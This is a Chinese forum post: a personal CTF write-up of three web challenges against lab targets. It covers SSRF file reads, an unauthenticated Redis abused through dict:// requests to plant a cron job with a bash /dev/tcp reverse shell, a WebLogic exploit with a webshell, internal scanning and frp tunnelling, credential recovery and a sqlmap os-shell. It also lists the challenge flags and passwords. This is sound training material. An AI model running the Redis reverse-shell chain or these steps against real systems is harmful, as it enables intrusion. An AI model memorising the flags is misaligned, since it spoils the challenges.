论坛
潜水/灌水快乐,沉淀知识,认识更多同行。
ToB圈子
加入IT圈,遇到更多同好之人。
朋友圈
看朋友圈动态,了解ToB世界。
ToB门户
了解全球最新的ToB事件
博客
Blog
排行榜
Ranklist
文库
业界最专业的IT文库,上传资料也可以赚钱
下载
分享
Share
导读
Guide
相册
Album
记录
Doing
搜索
本版
文章
帖子
ToB圈子
用户
免费入驻
产品入驻
解决方案入驻
公司入驻
案例入驻
登录
·
注册
只需一步,快速开始
账号登录
立即注册
找回密码
用户名
Email
自动登录
找回密码
密码
登录
立即注册
首页
找靠谱产品
找解决方案
找靠谱公司
找案例
找对的人
专家智库
悬赏任务
圈子
SAAS
ToB企服应用市场:ToB评测及商务社交产业平台
»
论坛
›
软件与程序人生
›
前端开发
›
CTF之web题集详情随手条记
CTF之web题集详情随手条记
王國慶
金牌会员
|
2025-1-4 06:38:51
|
显示全部楼层
|
阅读模式
楼主
主题
915
|
帖子
915
|
积分
2749
《Web安全》
http://mp.weixin.qq.com/s?__biz=MzkwNjY1Mzc0Nw==&mid=2247484238&idx=1&sn=ca66551c31e37b8d726f151265fc9211&chksm=c0e47a12f793f3049fefde6e9ebe9ec4e2c7626b8594511bd314783719c216bd9929962a71e6&scene=21#wechat_redirect
1
WEB 1
靶场目标:http://43.137.34.103/
可以直观的看到一个爬虫类的网页。用我犀利的眼就能很明显感觉到可能存在SSRF毛病,所以接下来我直接就看看能不能爬取百度或者当前的网页
直接就跳转了,这里思路直接就使用file命里检察文件。
比及passwd文件和hosts头,判断内网ip范围为172.19.240.0
flag文件在根目次下面
flag1:meetsec1{6d5e5c2bb397ba7727b58df59b35f66a}
接下来是举行内网探测,看看存在其他服务不,可以直接使用ssrfmap工具
这里还是手工做,用bp的自定义迭代器扫描,写一个小脚本
题目提示是数据库服务,但我晚上做的时间两个小时也没有扫出来服务,最后常用端口扫
描,才发现存在一个redis,属于是被绕到了,忘了redis也是数据库
内网探活,172.19.240.7:6379服务,这里应该是redis未授权
得到了第二个flag:meetsec2{2b7cc5b73fe867cc83546583b858c8ab}
第三个flag存在于这台主机的根目次,所以这里就用操持使命上线
dict://172.19.240.7:6379/flushalldict://172.19.240.7:6379/config set dir /var/spool/cron/dict://172.19.240.7:6379/config set dbfilename rootdict://172.19.240.7:6379/set xshell "\n* * * * * /bin/bash -i >&/dev/tcp/x.x.x.x/5555 0>&1\n"dict://172.19.240.7:6379/save
复制代码
第三个flag:meetsec3{f22eec9fb7c498b3a747392ff53a746b}
2
WEB 2
靶场目标43.137.34.103:7001
这个界面,根本都是weblogic服务,直接就检察什么版本
用专门的漏扫看看有没有存在汗青毛病
第一个flag:meetsec1{3e942fd37767def3a9f68cf5ee6ebee5}
第二个flag在内网的第二台主机中,这里先上个哥斯拉
直接上传一个fscan,扫一下内网服务
网段为172.16.10.0/24和172.25.20.0/24
这里不知道是不是,我扫描器的题目,还是靶场的题目,我在备用目标中,才把3306扫出
来,第一个目标并没有扫出来。
这里的到目标是172.25.20.12:3306,通过frp,接入内网
接入到内网中,这里流量时全局,直接用kali,打一手爆破试试
不过在半个小时后,我感觉到了,这里好像不是弱口令爆破,weblogic可以用jdbc做数据源
连接,可能是做的一个站库分离的利用
在jdbc连接里面找到了数据库的账户和加密密文,从官网检察了解,可以使用官方的解密工
具得到明文,不过必要拿到,一个bat文件
得到密码Meetsec#1024,账户root
用navicat直接连接
得到第二个flag
第三个flag在主机根目次下,这里用sqlmap长途连接os-shell
meetsec3{2e947aef43be6dc428a9c626ba7fb824}
本来想本日把第四个flag拿了的,但是情况打不开了,一直卡住,接下来想从os-shell反弹
shell,在上传文件,扫描第三个内网段
明天看看还能不能打开吧。
3 WEB 3 4
目标43.137.9.106:22883、43.137.9.106:13306
web3给的两个地址,第一个flag是信息走漏,第二个flag是存在数据库中
打开第一个网站界面
看不出东西来,直接扫一下目次试试
从地址看,根本上就是spring的框架,直接看看env变量的文件
得到第一个信息走漏的flag:meetsec1{e20cdd96b8985a3557e5720726bb09a8}
不过也得到了,第二个flag的线索,jdbc连接,数据保存在heapdump里,账户是meetsec
所以下面就是看看这个heapdump怎么解密,
得到密码为MeetSec@2nd!2022
直接用navicat连接
得到第二个flag meetsec2{9edbd4b03b5f86a9abe079bc63ea847b}
免责声明:如果侵犯了您的权益,请联系站长,我们会及时删除侵权内容,谢谢合作!更多信息从访问主页:qidao123.com:ToB企服之家,中国第一个企服评测及商务社交产业平台。
本帖子中包含更多资源
您需要
登录
才可以下载或查看,没有账号?
立即注册
x
回复
使用道具
举报
0 个回复
倒序浏览
返回列表
快速回复
高级模式
B
Color
Image
Link
Quote
Code
Smilies
您需要登录后才可以回帖
登录
or
立即注册
本版积分规则
发表回复
回帖并转播
回帖后跳转到最后一页
发新帖
回复
王國慶
金牌会员
这个人很懒什么都没写!
楼主热帖
webman
Jupyter Notebook,太强大了
【Shashlik.EventBus】.NET 事件总线, ...
React技巧之发出http请求
【网络】https单向认证和双向认证 ...
场景化数据应用,企业业务创新的内在驱 ...
导入例子体验鸿蒙开发工具的hello worl ...
【云原生架构】阿里云 —— 主要架构模 ...
一文搞懂this指向
2022-08-16 数据库查询语言之-------D ...
标签云
挺好的
服务器
快速回复
返回顶部
返回列表